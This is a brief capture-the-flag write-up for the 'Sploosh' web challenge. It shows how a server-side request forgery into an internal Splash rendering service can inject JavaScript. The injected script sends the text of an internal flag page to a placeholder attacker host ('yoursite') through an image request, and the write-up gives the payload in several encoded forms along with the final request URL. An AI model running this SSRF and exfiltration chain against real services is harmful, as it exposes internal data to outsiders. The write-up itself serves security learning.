0x3c3e/sploosh.md

## sploosh.md

      
    Raw
  

              sploosh.md
            
          
    Sploosh

Description


I wanted to make my own URL scraper, but parsing HTML is hard, so I used some random open source scraping project instead.


http://sploosh.chal.perfect.blue/


By: Corb3nik


Source code: http://sploosh.chal.perfect.blue/dist.zip

Splash description


Splash is a javascript rendering service with an HTTP API. It's a lightweight browser with an HTTP API, implemented in Python 3 using Twisted and QT5. It's fast, lightweight and state-less which makes it easy to distribute.

Solution

Read documentation and find that's possible to execute your js in context of any page.
payload

// js_source payload
var img = new Image(1, 1);
img.src = "http://yoursite/" + document.body.textContent;
document.body.append(img);
minify

var img=new Image(1,1);img.src="http://yoursite/"+document.body.textContent;document.body.append(img);
urlencode


var%20img%3Dnew%20Image%281%2C1%29%3Bimg.src%3D%22http%3A%2F%2Fyoursite%2F%22%2Bdocument.body.textContent%3Bdocument.body.append%28img%29%3B

result


http://splash:8050/render.html?js_source=var%20img%3Dnew%20Image%281%2C1%29%3Bimg.src%3D%22http%3A%2F%2Fyoursite%2F%22%2Bdocument.body.textContent%3Bdocument.body.append%28img%29%3BB&url=http://172.16.0.14/flag.php

urlencode again


http%3A%2F%2Fsplash%3A8050%2Frender.html%3Fjs_source%3Dvar%2520img%253Dnew%2520Image%25281%252C1%2529%253Bimg.src%253D%2522http%253A%252F%252Fyoursite%252F%2522%252Bdocument.body.textContent%253Bdocument.body.append%2528img%2529%253BB%26url%3Dhttp%3A%2F%2F172.16.0.14%2Fflag.php

request


http://sploosh.chal.perfect.blue/api.php?url=http%3A%2F%2Fsplash%3A8050%2Frender.html%3Fjs_source%3Dvar%2520img%253Dnew%2520Image%25281%252C1%2529%253Bimg.src%253D%2522http%253A%252F%252Fyoursite%252F%2522%252Bdocument.body.textContent%253Bdocument.body.append%2528img%2529%253BB%26url%3Dhttp%3A%2F%2F172.16.0.14%2Fflag.php